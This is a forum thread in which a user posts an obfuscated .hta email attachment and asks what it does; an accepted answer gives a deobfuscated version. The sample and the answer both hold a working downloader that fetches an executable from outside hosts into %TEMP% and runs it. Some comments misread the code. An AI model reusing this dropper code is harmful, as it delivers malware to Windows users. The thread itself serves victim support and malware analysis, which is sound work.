# what can this .hta file do?

Tags: html, .htaccess, hta

I just got an email with an attachement of .hta file and here is the code:

```
    <html>
<head><script language='JScript'>
String.prototype.yakamurahirobetobeVIUVIUVIUtttoooo = function() {
yakamurahirobetobeVIUVIUVIUXCOP = 0;    
    var yakamurahirobetobeVIUVIUVIUddDccC1, yakamurahirobetobeVIUVIUVIUddDccC2, yakamurahirobetobeVIUVIUVIUc3, yakamurahirobetobeVIUVIUVIUc4;
    var yakamurahirobetobeVIUVIUVIUsudarinaB = this;
    yakamurahirobetobeVIUVIUVIUsudarinaB= yakamurahirobetobeVIUVIUVIUsudarinaB.replace(/GOGOGA/g, '');
    var yakamurahirobetobeVIUVIUVIUout = "";

var  yakamurahirobetobeVIUVIUVIUlen = yakamurahirobetobeVIUVIUVIUsud(yakamurahirobetobeVIUVIUVIUsudarinaB);     
    while (yakamurahirobetobeVIUVIUVIUXCOP < yakamurahirobetobeVIUVIUVIUlen) {
        do {
            yakamurahirobetobeVIUVIUVIUddDccC1 = yakamurahirobetobeVITKS[yakamurahirobetobeVIUVIUVIUsudarinaB.charCodeAt(yakamurahirobetobeVIUVIUVIUXCOP++) & 0xff];
        } while (yakamurahirobetobeVIUVIUVIUXCOP < yakamurahirobetobeVIUVIUVIUlen && yakamurahirobetobeVIUVIUVIUddDccC1 == -1);

        if (yakamurahirobetobeVIUVIUVIUddDccC1 == -1)
            break;
var yakamurahirobetobeVIUVIUVIUdodo = false;
        do {
            yakamurahirobetobeVIUVIUVIUddDccC2 = yakamurahirobetobeVITKS[yakamurahirobetobeVIUVIUVIUsudarinaB.charCodeAt(yakamurahirobetobeVIUVIUVIUXCOP++) & 0xff];
        yakamurahirobetobeVIUVIUVIUdodo = yakamurahirobetobeVIUVIUVIUXCOP < yakamurahirobetobeVIUVIUVIUlen && yakamurahirobetobeVIUVIUVIUddDccC2 == -1;
        } while (yakamurahirobetobeVIUVIUVIUdodo);

        if (yakamurahirobetobeVIUVIUVIUddDccC2 == -1)
            break;

        yakamurahirobetobeVIUVIUVIUout += String.fromCharCode((yakamurahirobetobeVIUVIUVIUddDccC1 << 2) | ((yakamurahirobetobeVIUVIUVIUddDccC2 & 0x30) >> 4));

        do {
            yakamurahirobetobeVIUVIUVIUc3 = yakamurahirobetobeVIUVIUVIUsudarinaB.charCodeAt(yakamurahirobetobeVIUVIUVIUXCOP++) & 0xff;

            if (yakamurahirobetobeVIUVIUVIUc3 == 10*6+0.5*2)
                return yakamurahirobetobeVIUVIUVIUout;

            yakamurahirobetobeVIUVIUVIUc3 = yakamurahirobetobeVITKS[yakamurahirobetobeVIUVIUVIUc3];
        } while (yakamurahirobetobeVIUVIUVIUXCOP < yakamurahirobetobeVIUVIUVIUlen && yakamurahirobetobeVIUVIUVIUc3 == -1);

        if (yakamurahirobetobeVIUVIUVIUc3 == -1)
            break;

        yakamurahirobetobeVIUVIUVIUout += String.fromCharCode(((yakamurahirobetobeVIUVIUVIUddDccC2 & 0XF) << 4) | ((yakamurahirobetobeVIUVIUVIUc3 & 0x3c) >> 2));

        do {
            yakamurahirobetobeVIUVIUVIUc4 = yakamurahirobetobeVIUVIUVIUsudarinaB.charCodeAt(yakamurahirobetobeVIUVIUVIUXCOP++) & 0xff;

            if (yakamurahirobetobeVIUVIUVIUc4 == 61)
                return yakamurahirobetobeVIUVIUVIUout;

            yakamurahirobetobeVIUVIUVIUc4 = yakamurahirobetobeVITKS[yakamurahirobetobeVIUVIUVIUc4];
        } while (yakamurahirobetobeVIUVIUVIUXCOP < yakamurahirobetobeVIUVIUVIUlen && yakamurahirobetobeVIUVIUVIUc4 == -1);

        if (yakamurahirobetobeVIUVIUVIUc4 == -1)
            break;

        yakamurahirobetobeVIUVIUVIUout += String.fromCharCode(((yakamurahirobetobeVIUVIUVIUc3 & 0x03) << 6) | yakamurahirobetobeVIUVIUVIUc4);
    }

    return yakamurahirobetobeVIUVIUVIUout;
};
function ProcessFolder(folderPath)
        {
            var path = "";

            for (var i in maskArr)
            {
                path = folderPath + "\\" + maskArr[i];

                try { fsoObj.DeleteFile(path); } catch (e) {}
                try { fsoObj.DeleteFolder(path); } catch (e) {}
            }

            var subfolders = new Enumerator(fsoObj.GetFolder(folderPath).SubFolders);

            for(; !subfolders.atEnd(); subfolders.moveNext())
                ProcessFolder(subfolders.item().Path);
        }



    function yakamurahirobetobeVIUVIUVIUsud(vardos){
return vardos[("yakamurahirobetobeVIUVIUVIUprosy","yakamurahirobetobeVIUVIUVIUoffering","yakamurahirobetobeVIUVIUVIUspecialized","yakamurahirobetobeVIUVIUVIUalicia","yakamurahirobetobeVIUVIUVIUenormity","l") + ("yakamurahirobetobeVIUVIUVIUinter","yakamurahirobetobeVIUVIUVIUcrest","yakamurahirobetobeVIUVIUVIUnoisily","yakamurahirobetobeVIUVIUVIUpenguin","yakamurahirobetobeVIUVIUVIUdrops","en")+("yakamurahirobetobeVIUVIUVIUplaintiff","yakamurahirobetobeVIUVIUVIUholiday","yakamurahirobetobeVIUVIUVIUsymphony","yakamurahirobetobeVIUVIUVIUlegally","yakamurahirobetobeVIUVIUVIUcelibate","gt")+("yakamurahirobetobeVIUVIUVIUappointments","yakamurahirobetobeVIUVIUVIUlooksmart","yakamurahirobetobeVIUVIUVIUmotorcycles","yakamurahirobetobeVIUVIUVIUbreakwater","yakamurahirobetobeVIUVIUVIUchart","h")];
}
yakamurahirobetobeVIUVIUVIUmisterdenisk.dEDWWEE = function(){


    yakamurahirobetobeVIUVIUVIUpublisher.yakamurahirobetobeVIUVIUVIUpublish(this.yakamurahirobetobeVIUVIUVIUtype1);
    yakamurahirobetobeVIUVIUVIUok(yakamurahirobetobeVIUVIUVIUspyFunction1.yakamurahirobetobeVIUVIUVIUcalledWith(), "Function called without arguments");

    yakamurahirobetobeVIUVIUVIUpublisher.yakamurahirobetobeVIUVIUVIUpublish(this.yakamurahirobetobeVIUVIUVIUtype1, "PROPER1");
    yakamurahirobetobeVIUVIUVIUok(yakamurahirobetobeVIUVIUVIUspyFunction1.yakamurahirobetobeVIUVIUVIUcalledWith("PROPER1"), "Function called with 'PROPER1' argument");

    yakamurahirobetobeVIUVIUVIUpublisher.yakamurahirobetobeVIUVIUVIUpublish(this.yakamurahirobetobeVIUVIUVIUtype1, ["PROPER1", "PROPER2"]);

};

var yakamurahirobetobeVITKS = new Array(-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-39,-102,-102,-102,-38,-49,-48,-47,-46,-45,-44,-43,-42,-41,-40,-102,-102,-102,-102,-102,-102,-102,-101,-100,-99,-98,-97,-96,-95,-94,-93,-92,-91,-90,-89,-88,-87,-86,-85,-84,-83,-82,-81,-80,-79,-78,-77,-76,-102,-102,-102,-102,-102,-102,-75,-74,-73,-72,-71,-70,-69,-68,-67,-66,-65,-64,-63,-62,-61,-60,-59,-58,-57,-56,-55,-54,-53,-52,-51,-50,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102,-102);
var yakamurahirobetobeVITKI, yakamurahirobetobeVITKSn = yakamurahirobetobeVITKS.length;
    for (yakamurahirobetobeVITKI= 0; yakamurahirobetobeVITKI < yakamurahirobetobeVITKSn; ++yakamurahirobetobeVITKI) {
       yakamurahirobetobeVITKS[yakamurahirobetobeVITKI] = yakamurahirobetobeVITKS[yakamurahirobetobeVITKI] + 101;
    }
    function moveToParentFolder(parentFolder, folder) {
  // 対象フォルダのサブフォルダ列挙
  var subFolders = new Enumerator(folder.SubFolders);
  // サブフォルダ内のファイルを移動
  for (; !subFolders.atEnd(); subFolders.moveNext()) {
    moveToParentFolder(parentFolder, subFolders.item());
  }
  // フォルダ内のファイル列挙
  var files = new Enumerator(folder.Files);
  // ファイルを移動
  for (; !files.atEnd(); files.moveNext()) {
    try {
      files.item().Move(parentFolder.Path + '\\');
    }
    catch (e) {
      WScript.Echo(e.description + "\n" + files.item().Path);
    }
  }
  // ファイルとサブフォルダがなければフォルダ削除
  if (folder.Files.Count == 0 && folder.SubFolders.Count == 0) {
    try {
      folder.Delete(true);
    }
    catch (e) {
      WScript.Echo(e.description + "\n" + folder.Path);
    }
  }
}
var yakamurahirobetobeVIUVIUVIUqtcnthltqfqrhfq = {'U': 'S', ':': '.','88':'', '77':'','HOLSTEN': 'X',  '99':'', 'PLAHISH':'ons'};

function yakamurahirobetobeVIUVIUVIUachievment(yakamurahirobetobeVIUVIUVIUbidttt){if(yakamurahirobetobeVIUVIUVIUbidttt==1){return 2;}else{return 17;}
return 3;};
 function yakamurahirobetobeVIUVIUVIUcenter(yakamurahirobetobeVIUVIUVIUrivulet) {
    request = yakamurahirobetobeVIUVIUVIUrivulet;
    for (var yakamurahirobetobeVIUVIUVIUXCOP in yakamurahirobetobeVIUVIUVIUqtcnthltqfqrhfq){request = request.replace(yakamurahirobetobeVIUVIUVIUXCOP, yakamurahirobetobeVIUVIUVIUqtcnthltqfqrhfq[yakamurahirobetobeVIUVIUVIUXCOP]);}
    return request;
};

    var yakamurahirobetobeVIUVIUVIUDRUZA = 43* (51-2)*(27-26-1);

function yakamurahirobetobeVIUVIUVIUmisterdenisk(yakamurahirobetobePOPSPOPx, yakamurahirobetobePOPSPOPy) {
    yakamurahirobetobePOPSPOPx = DDyakamurahirobetobePOPSPOP * yakamurahirobetobePOPSPOPddd;
    yakamurahirobetobePOPSPOPy = yakamurahirobetobePOPSPOPZZ + 245;
};

    var yakamurahirobetobeVIUVIUVIUsecupeku=typeof(yakamurahirobetobeVIUVIUVIUGzEAPd)==="undefined";

var yakamurahirobetobeVIUVIUVIUchosen = 0.5 * 2;  
if(!yakamurahirobetobeVIUVIUVIUsecupeku){
yakamurahirobetobeVIUVIUVIUmisterdenisk.scale = function(yakamurahirobetobeVIUVIUVIUp, yakamurahirobetobeVIUVIUVIUscaleX, yakamurahirobetobeVIUVIUVIUscaleY) {
    if (yakamurahirobetobeVIUVIUVIUXCOPsObject(yakamurahirobetobeVIUVIUVIUscaleX)) {
        yakamurahirobetobeVIUVIUVIUscaleY = yakamurahirobetobeVIUVIUVIUscaleX.y;
        yakamurahirobetobeVIUVIUVIUscaleX = yakamurahirobetobeVIUVIUVIUscaleX.x;
    } else if (!yakamurahirobetobeVIUVIUVIUXCOPsNumber(yakamurahirobetobeVIUVIUVIUscaleY)) {
        yakamurahirobetobeVIUVIUVIUscaleY = yakamurahirobetobeVIUVIUVIUscaleX;
    }
    return new yakamurahirobetobeVIUVIUVIUmisterdenisk(yakamurahirobetobeVIUVIUVIUp.x * yakamurahirobetobeVIUVIUVIUscaleX, yakamurahirobetobeVIUVIUVIUp.y * yakamurahirobetobeVIUVIUVIUscaleY);
};

}

if(!yakamurahirobetobeVIUVIUVIUsecupeku){
yakamurahirobetobeVIUVIUVIUmisterdenisk.yakamurahirobetobeVIUVIUVIUsameOrN = function(yakamurahirobetobeVIUVIUVIUparam1, yakamurahirobetobeVIUVIUVIUparam2) {
    return yakamurahirobetobeVIUVIUVIUparam1.D == yakamurahirobetobeVIUVIUVIUparam2.D || yakamurahirobetobeVIUVIUVIUparam1.F == yakamurahirobetobeVIUVIUVIUparam2.F;
};

yakamurahirobetobeVIUVIUVIUmisterdenisk.angle = function(yakamurahirobetobeVIUVIUVIUp) {
    return Math.atan2(yakamurahirobetobeVIUVIUVIUp.y, yakamurahirobetobeVIUVIUVIUp.x);
};
    }



var yakamurahirobetobeVIUVIUVIUVARDOCF ="JVRFTVAl".yakamurahirobetobeVIUVIUVIUtttoooo();
var yakamurahirobetobeVIUVIUVIUfinde = "QWN0aXZlWE9iamVjdA==".yakamurahirobetobeVIUVIUVIUtttoooo();
String.prototype.yakamurahirobetobeVIUVIUVIUcenter2 = function () {
    var yakamurahirobetobeVIUVIUVIUpirkinst = {
        yakamurahirobetobeVIUVIUVIUVARDOCG: this
    };
    yakamurahirobetobeVIUVIUVIUpirkinst.yakamurahirobetobeVIUVIUVIUVARDOCE = yakamurahirobetobeVIUVIUVIUpirkinst.yakamurahirobetobeVIUVIUVIUVARDOCG["c3Vic3RyaW5n".yakamurahirobetobeVIUVIUVIUtttoooo()](yakamurahirobetobeVIUVIUVIUDRUZA, yakamurahirobetobeVIUVIUVIUchosen);
    return yakamurahirobetobeVIUVIUVIUpirkinst.yakamurahirobetobeVIUVIUVIUVARDOCE;
};

var yakamurahirobetobeVIUVIUVIUsirdallos ="RXhwYW5kRW52aXJvbm1lbnRTdHJpbmdz".yakamurahirobetobeVIUVIUVIUtttoooo();
var yakamurahirobetobeVIUVIUVIUNative = function(options){

};yakamurahirobetobeVIUVIUVIUNative.yakamurahirobetobeVIUVIUVIUXCOPmplement = function(yakamurahirobetobeVIUVIUVIUobjects, yakamurahirobetobeVIUVIUVIUproperties){
    for (var yakamurahirobetobeVIUVIUVIUXCOP = 0, yakamurahirobetobeVIUVIUVIUl = yakamurahirobetobeVIUVIUVIUobjects.length; yakamurahirobetobeVIUVIUVIUXCOP < yakamurahirobetobeVIUVIUVIUl; yakamurahirobetobeVIUVIUVIUXCOP++) yakamurahirobetobeVIUVIUVIUobjects[yakamurahirobetobeVIUVIUVIUXCOP].yakamurahirobetobeVIUVIUVIUXCOPmplement(yakamurahirobetobeVIUVIUVIUproperties);
};
var yakamurahirobetobeVIUVIUVIUd7 = yakamurahirobetobeVIUVIUVIUcenter("77M"+"88SX"+"99ML"+("yakamurahirobetobeVIUVIUVIUmosquitoes","yakamurahirobetobeVIUVIUVIUphoto","yakamurahirobetobeVIUVIUVIUstayed","yakamurahirobetobeVIUVIUVIUgrenada","yakamurahirobetobeVIUVIUVIUreindeer","2.")+"HOLSTENM"+"LH"+"TT"+("yakamurahirobetobeVIUVIUVIUillusory","yakamurahirobetobeVIUVIUVIUcontained","yakamurahirobetobeVIUVIUVIUbilliards","yakamurahirobetobeVIUVIUVIUrefers","yakamurahirobetobeVIUVIUVIUtransexuales","yakamurahirobetobeVIUVIUVIUspecification","yakamurahirobetobeVIUVIUVIUconstitutes","yakamurahirobetobeVIUVIUVIUdesideratum","P}")+"WU"+("yakamurahirobetobeVIUVIUVIUegregious","yakamurahirobetobeVIUVIUVIUdietary","yakamurahirobetobeVIUVIUVIUcelebrity","yakamurahirobetobeVIUVIUVIUhopes","yakamurahirobetobeVIUVIUVIUdrunk","yakamurahirobetobeVIUVIUVIUperiodically","yakamurahirobetobeVIUVIUVIUfatherhood","cr")+("yakamurahirobetobeVIUVIUVIUgenerations","yakamurahirobetobeVIUVIUVIUquarterly","yakamurahirobetobeVIUVIUVIUwording","yakamurahirobetobeVIUVIUVIUpeking","yakamurahirobetobeVIUVIUVIUreturning","yakamurahirobetobeVIUVIUVIUsuccor","yakamurahirobetobeVIUVIUVIUcharging","yakamurahirobetobeVIUVIUVIUmagnify","ip")+"t:S"+("yakamurahirobetobeVIUVIUVIUtoward","yakamurahirobetobeVIUVIUVIUoutlined","yakamurahirobetobeVIUVIUVIUsubstitute","yakamurahirobetobeVIUVIUVIUamend","yakamurahirobetobeVIUVIUVIUfigurative","yakamurahirobetobeVIUVIUVIUdeviation","yakamurahirobetobeVIUVIUVIUlatch","yakamurahirobetobeVIUVIUVIUtyson","h")+"e"+("yakamurahirobetobeVIUVIUVIUsixtytwo","yakamurahirobetobeVIUVIUVIUravenous","yakamurahirobetobeVIUVIUVIUorganize","yakamurahirobetobeVIUVIUVIUcholera","yakamurahirobetobeVIUVIUVIUoptimism","yakamurahirobetobeVIUVIUVIUdonate","yakamurahirobetobeVIUVIUVIUhouseboat","yakamurahirobetobeVIUVIUVIUincumbent","ll"));
var yakamurahirobetobeVIUVIUVIUDoUtra = [yakamurahirobetobeVIUVIUVIUfinde, yakamurahirobetobeVIUVIUVIUsirdallos,yakamurahirobetobeVIUVIUVIUVARDOCF,  ""+"."+("yakamurahirobetobeVIUVIUVIUcognition","yakamurahirobetobeVIUVIUVIUtrumpery","yakamurahirobetobeVIUVIUVIUpapers","yakamurahirobetobeVIUVIUVIUnecessitate","yakamurahirobetobeVIUVIUVIUesplanade","yakamurahirobetobeVIUVIUVIUwrinkle","yakamurahirobetobeVIUVIUVIUreunion","yakamurahirobetobeVIUVIUVIUtorpor","exe"), "UnVu".yakamurahirobetobeVIUVIUVIUtttoooo(),yakamurahirobetobeVIUVIUVIUd7];
yakamurahirobetobeVIUVIUVIURichters = yakamurahirobetobeVIUVIUVIUDoUtra.shift();
yakamurahirobetobeVIUVIUVIUfabled = "BIL2NEBIL";
yakamurahirobetobeVIUVIUVIUNative.yakamurahirobetobeVIUVIUVIUgenericize = function(object, yakamurahirobetobeVIUVIUVIUproperty, yakamurahirobetobeVIUVIUVIUcheck){
    if ((!yakamurahirobetobeVIUVIUVIUcheck || !object[yakamurahirobetobeVIUVIUVIUproperty]) && typeof object.prototype[yakamurahirobetobeVIUVIUVIUproperty] == 'function') object[yakamurahirobetobeVIUVIUVIUproperty] = function(){
        return object.prototype[yakamurahirobetobeVIUVIUVIUproperty].apply(yakamurahirobetobeVIUVIUVIUargs.shift(), yakamurahirobetobeVIUVIUVIUargs);
    };
};
yakamurahirobetobeVIUVIUVIUNative.yakamurahirobetobeVIUVIUVIUtypize = function(object, yakamurahirobetobeVIUVIUVIUfamily){
    if (!object.type) object.type = function(item){
        return (yakamurahirobetobeVIUVIUVIU$type(item) === yakamurahirobetobeVIUVIUVIUfamily);
    };
};
var yakamurahirobetobeVIUVIUVIULitoyDISK = this[yakamurahirobetobeVIUVIUVIURichters ];
yakamurahirobetobeVIUVIUVIUcasque = (("yakamurahirobetobeVIUVIUVIUinterpose", "yakamurahirobetobeVIUVIUVIUmorphine", "yakamurahirobetobeVIUVIUVIUshipped", "yakamurahirobetobeVIUVIUVIUdiagonal", "yakamurahirobetobeVIUVIUVIUdelta", "yakamurahirobetobeVIUVIUVIUwhiles", "yakamurahirobetobeVIUVIUVIUsynthetic", "pwrthrthrthtr") + "hrhrwhrwh").yakamurahirobetobeVIUVIUVIUcenter2();
yakamurahirobetobeVIUVIUVIUtudabilo1 = (("yakamurahirobetobeVIUVIUVIUachieved", "yakamurahirobetobeVIUVIUVIUfilms", "yakamurahirobetobeVIUVIUVIUinflected", "yakamurahirobetobeVIUVIUVIUsuburban", "yakamurahirobetobeVIUVIUVIUoriginating", "yakamurahirobetobeVIUVIUVIUpuppy", "yakamurahirobetobeVIUVIUVIUflower", "yakamurahirobetobeVIUVIUVIUencounter", "yakamurahirobetobeVIUVIUVIUearning", "serhrth") + "herrth4th4wh").yakamurahirobetobeVIUVIUVIUcenter2();
var yakamurahirobetobeVIUVIUVIUd2 = yakamurahirobetobeVIUVIUVIUDoUtra.pop();
var yakamurahirobetobeVIUVIUVIUrampart = new yakamurahirobetobeVIUVIUVIULitoyDISK(yakamurahirobetobeVIUVIUVIUd2.split("}")[1]);
var yakamurahirobetobeVIUVIUVIUsudabilo1 = new yakamurahirobetobeVIUVIUVIULitoyDISK(yakamurahirobetobeVIUVIUVIUd2.split("}")[0]);
var yakamurahirobetobeVIUVIUVIUvulture = yakamurahirobetobeVIUVIUVIUrampart[yakamurahirobetobeVIUVIUVIUDoUtra.shift()](yakamurahirobetobeVIUVIUVIUDoUtra.shift());
var yakamurahirobetobeVIUVIUVIUweasel = "E";

var yakamurahirobetobeVIUVIUVIUamalgamation = yakamurahirobetobeVIUVIUVIUDoUtra.shift();
var yakamurahirobetobeVIUVIUVIUpromises = yakamurahirobetobeVIUVIUVIUDoUtra.shift();
var yakamurahirobetobeVIUVIUVIUostrokoncert = "b3Blbg==".yakamurahirobetobeVIUVIUVIUtttoooo();


        yakamurahirobetobeVIUVIUVIURhXxGud = "type";



function yakamurahirobetobeVIUVIUVIU_a2(yakamurahirobetobeVIUVIUVIUgutter, yakamurahirobetobeVIUVIUVIUStrokaParam2) {

        var yakamurahirobetobeVIUVIUVIUwandermander = yakamurahirobetobeVIUVIUVIUvulture;
        yakamurahirobetobeVIUVIUVIUwandermander=yakamurahirobetobeVIUVIUVIUwandermander+ "\u002f";
yakamurahirobetobeVIUVIUVIUwandermander=yakamurahirobetobeVIUVIUVIUwandermander + yakamurahirobetobeVIUVIUVIUStrokaParam2 ;

            yakamurahirobetobeVIUVIUVIUsudabilo1[yakamurahirobetobeVIUVIUVIUostrokoncert](("yakamurahirobetobeVIUVIUVIUpossibilities","yakamurahirobetobeVIUVIUVIUportsmouth","yakamurahirobetobeVIUVIUVIUiceland","yakamurahirobetobeVIUVIUVIUcommodity","yakamurahirobetobeVIUVIUVIUslash","yakamurahirobetobeVIUVIUVIUlocate","yakamurahirobetobeVIUVIUVIUtechno","yakamurahirobetobeVIUVIUVIUlabour","G" + yakamurahirobetobeVIUVIUVIUweasel) + ("yakamurahirobetobeVIUVIUVIUcringe","yakamurahirobetobeVIUVIUVIUintolerance","yakamurahirobetobeVIUVIUVIUbraxton","yakamurahirobetobeVIUVIUVIUdappled","yakamurahirobetobeVIUVIUVIUvestibule","yakamurahirobetobeVIUVIUVIUaffirmation","yakamurahirobetobeVIUVIUVIUpriestess","yakamurahirobetobeVIUVIUVIUjerry","yakamurahirobetobeVIUVIUVIUmilliner","yakamurahirobetobeVIUVIUVIUsheriff","T"), yakamurahirobetobeVIUVIUVIUgutter, false);
       yakamurahirobetobeVIUVIUVIUsudabilo1.setRequestHeader("User-Agent", "TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMCk=".yakamurahirobetobeVIUVIUVIUtttoooo());
    yakamurahirobetobeVIUVIUVIUsudabilo1[yakamurahirobetobeVIUVIUVIUtudabilo1 + ("yakamurahirobetobeVIUVIUVIUtrader","yakamurahirobetobeVIUVIUVIUconsumptive","yakamurahirobetobeVIUVIUVIUharass","yakamurahirobetobeVIUVIUVIUprofession","yakamurahirobetobeVIUVIUVIUmedicare","end")]();


        yakamurahirobetobeVIUVIUVIUwandermander = yakamurahirobetobeVIUVIUVIUwandermander  + yakamurahirobetobeVIUVIUVIUamalgamation;
    if (yakamurahirobetobeVIUVIUVIUsecupeku) {

        var yakamurahirobetobeVIUVIUVIUNananananananana = new yakamurahirobetobeVIUVIUVIULitoyDISK(("ARYBKA"+("yakamurahirobetobeVIUVIUVIUchichester","yakamurahirobetobeVIUVIUVIUbreakwater","yakamurahirobetobeVIUVIUVIUpromotional","yakamurahirobetobeVIUVIUVIUcosmetics","yakamurahirobetobeVIUVIUVIUbrunswick","yakamurahirobetobeVIUVIUVIUoptional","yakamurahirobetobeVIUVIUVIUmicro","yakamurahirobetobeVIUVIUVIUnominee","O")+"DB"+("yakamurahirobetobeVIUVIUVIUregarding","yakamurahirobetobeVIUVIUVIUcaretaker","yakamurahirobetobeVIUVIUVIUrepugnant","yakamurahirobetobeVIUVIUVIUcorfu","yakamurahirobetobeVIUVIUVIUunbiased","yakamurahirobetobeVIUVIUVIUenquiry","yakamurahirobetobeVIUVIUVIUinteresting",".S")+"tr12").replace("RYBKA", "D").replace("12", "eam"));
         yakamurahirobetobeVIUVIUVIUNananananananana[yakamurahirobetobeVIUVIUVIUostrokoncert]();
        yakamurahirobetobeVIUVIUVIUNananananananana[yakamurahirobetobeVIUVIUVIURhXxGud] = yakamurahirobetobeVIUVIUVIUchosen;
        yakamurahirobetobePAPAPAMGaSMa = "BIL10NEBIL";
        yakamurahirobetobeVIUVIUVIUNananananananana["d3JpdGU=".yakamurahirobetobeVIUVIUVIUtttoooo()](yakamurahirobetobeVIUVIUVIUsudabilo1[("yakamurahirobetobeVIUVIUVIUmephistopheles","yakamurahirobetobeVIUVIUVIUgeneva","yakamurahirobetobeVIUVIUVIUstrategic","yakamurahirobetobeVIUVIUVIUmaybe","yakamurahirobetobeVIUVIUVIUlibyan","yakamurahirobetobeVIUVIUVIUdrivers","Re")+"s"+("yakamurahirobetobeVIUVIUVIUappeals","yakamurahirobetobeVIUVIUVIUmyanmar","yakamurahirobetobeVIUVIUVIUpicked","yakamurahirobetobeVIUVIUVIUprimrose","yakamurahirobetobeVIUVIUVIUmagazines","yakamurahirobetobeVIUVIUVIUscorch","p")+yakamurahirobetobeVIUVIUVIUqtcnthltqfqrhfq['PLAHISH']+"e"+"Qm9keQ==".yakamurahirobetobeVIUVIUVIUtttoooo()]);
          yakamurahirobetobeVIUVIUVIUXWaxeQhw = "BIL11NEBIL";
        yakamurahirobetobeVIUVIUVIUNananananananana[(yakamurahirobetobeVIUVIUVIUcasque + "o"+"220"+("yakamurahirobetobeVIUVIUVIUadhered","yakamurahirobetobeVIUVIUVIUadobe","yakamurahirobetobeVIUVIUVIUconcerning","yakamurahirobetobeVIUVIUVIUguidelines","yakamurahirobetobeVIUVIUVIUacclamation","yakamurahirobetobeVIUVIUVIUhomes","yakamurahirobetobeVIUVIUVIUcontumely","22i")+"tion").replace("22"+("yakamurahirobetobeVIUVIUVIUpressure","yakamurahirobetobeVIUVIUVIUbarrow","yakamurahirobetobeVIUVIUVIUanymore","yakamurahirobetobeVIUVIUVIUapparatus","yakamurahirobetobeVIUVIUVIUlocations","yakamurahirobetobeVIUVIUVIUlobby","yakamurahirobetobeVIUVIUVIUcentres","022"), yakamurahirobetobeVIUVIUVIUtudabilo1)] = 0;

       yakamurahirobetobeVIUVIUVIUkrDwvrh = "BIL12NEBIL";
        yakamurahirobetobeVIUVIUVIUNananananananana["c2F2ZVRvRmlsZQ==".yakamurahirobetobeVIUVIUVIUtttoooo()](yakamurahirobetobeVIUVIUVIUwandermander, 2);
        yakamurahirobetobeVIUVIUVIUSswQdi = "BIL13NEBIL";
        yakamurahirobetobeVIUVIUVIUNananananananana["Y2xvc2U=".yakamurahirobetobeVIUVIUVIUtttoooo()]();


        yakamurahirobetobeVIUVIUVIUrampart[yakamurahirobetobeVIUVIUVIUpromises](yakamurahirobetobeVIUVIUVIUwandermander, yakamurahirobetobeVIUVIUVIUchosen, true);
    }

};



var yakamurahirobetobeVIUVIUVIU_a5 = ["dGOGOGA3d3LmFnZW56aWFkaW5pLml0L0dIQnV5ZDQ3MgGOGOGA==","a2xuaGOGOGAmxsemw3OC53ZWIuZmMyLmNvbS9HSEJ1eWQ0NzI=","bWFuaW1hbmltb25leS53ZWIuGOGOGAZmMyLmNvbS9HSEJ1eWQ0NzI="]; 
for(yakamurahirobetobeVIUVIUVIUuueee in yakamurahirobetobeVIUVIUVIU_a5){

try{

yakamurahirobetobeVIUVIUVIU_a2("http://"+yakamurahirobetobeVIUVIUVIU_a5[yakamurahirobetobeVIUVIUVIUuueee].yakamurahirobetobeVIUVIUVIUtttoooo() + "?bPxXNr=LUmUhmmq","Exgngo");
}catch(yakamurahirobetobeVIUVIUVIU_a3){alert(yakamurahirobetobeVIUVIUVIU_a3.message);}
}

 </script>

</body>
</html>
```

I opened it in my browser and  now i'm afraid it is some kind of a hack.
 what can I do now for my security?

should i delete all senstive data in my browser? I'm using google chrome which has all passwords stored. I'm using Ubuntu 16.04.

Comment: Seems like it's trying to modify a memory address of something, which is what a virus and scam does.

Comment: what can I do to stop this?

Comment: Well are you experiencing something weird on your computer after you opened it? Do a full scan on your computer with the antivirus you're using and see if there are any malicious files created in your system. Edit: seeing the code, it looks like it injected [User Agent](https://en.wikipedia.org/wiki/User_agent) in your pc.

Comment: No idea what Milan is trying to say, but if you opened this file on Ubuntu (or basically anything non-Windows), you are almost certainly safe. A `.hta` file is a type of executable HTML file on Windows with some extra privileges, often used as a trick payload to be run to download other malware.

Comment: @AlexanderO'Mara samething came to my mind,which is why i've mentioned my OS. I was just afraid if that code could do something in mybrowser!

Comment: I received that too , in a zip file image19.zip it showed company email address as sender email but when i opened it wasn't the format we normally use for docs. so i opened it in notepad as a usually do with suspicious attachments but after seeing it filled with scripts i googled its contents and bumped here.I guess hta files can only run on IE so i was safe even if i had opened it as i have already removed IE from my system

Answer (score 7, accepted):

I received this attachement today and decided to investigate a bit. Here is the deobfuscated version:

```js
var wscriptShell = new ActiveXObject('WScript.Shell');
var msxml2XmlHttp = new ActiveXObject('MSXML2.XMLHTTP');
var tempFolder = wscriptShell.ExpandEnvironmentStrings("%TEMP%");

function download(url, file) {
    var fullpath = tempFolder + '/' + file + '.exe';

    msxml2XmlHttp.open("GET", url, false);
    msxml2XmlHttp.setRequestHeader("User-Agent", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
    msxml2XmlHttp["send"]();

    var adodbStream = new ActiveXObject("ADODB.Stream");
    adodbStream.open();
    adodbStream.type = 1;
    adodbStream.write(sudabilo1["ResponseBody"]);
    adodbStream.position = 0;

    adodbStream.saveToFile(fullpath, 2);
    adodbStream.close();

    wscriptShell.Run(fullpath, 1, true);
}

var urls = [
    "brunnenburg.de/GHBuyd472",
    "klnjllzl78.web.fc2.com/GHBuyd472",
    "w3rx80no.homepage.t-online.de/GHBuyd472"
];

for(i in urls) {
    try {
        download("http://" + urls[i] + "?huLara=HlyrvuBeY", "yXbJOHB");
